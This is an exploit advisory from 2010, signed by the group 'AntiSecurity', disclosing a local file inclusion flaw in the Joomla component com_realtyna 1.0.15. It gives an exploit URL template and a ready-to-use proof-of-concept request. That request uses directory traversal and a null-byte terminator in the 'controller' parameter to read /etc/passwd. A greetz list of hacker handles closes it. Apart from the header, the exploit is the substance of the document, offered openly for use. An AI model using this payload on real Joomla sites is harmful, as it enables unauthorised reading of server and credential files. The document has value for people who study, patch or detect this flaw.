============================================================================================================== [o] Joomla Component Realtyna Translator Local File Inclusion Vulnerability Software : com_realtyna version 1.0.15 Vendor : http://software.realtyna.com/ Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] Contact : public[at]antisecurity[dot]org Home : http://antisecurity.org/ ============================================================================================================== [o] Exploit http://localhost/[path]/index.php?option=com_realtyna&controller=[LFI] [o] PoC http://localhost/index.php?option=com_realtyna&controller=../../../../../../../../../../etc/passwd%00 ============================================================================================================== [o] Greetz Angela Zhang stardustmemory aJe martfella pizzyroot Genex H312Y yooogy mousekill }^-^{ noname matthews kaka11 wishnusakti skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke ============================================================================================================== [o] April 08 2010 - GMT +07:00 Jakarta, Indonesia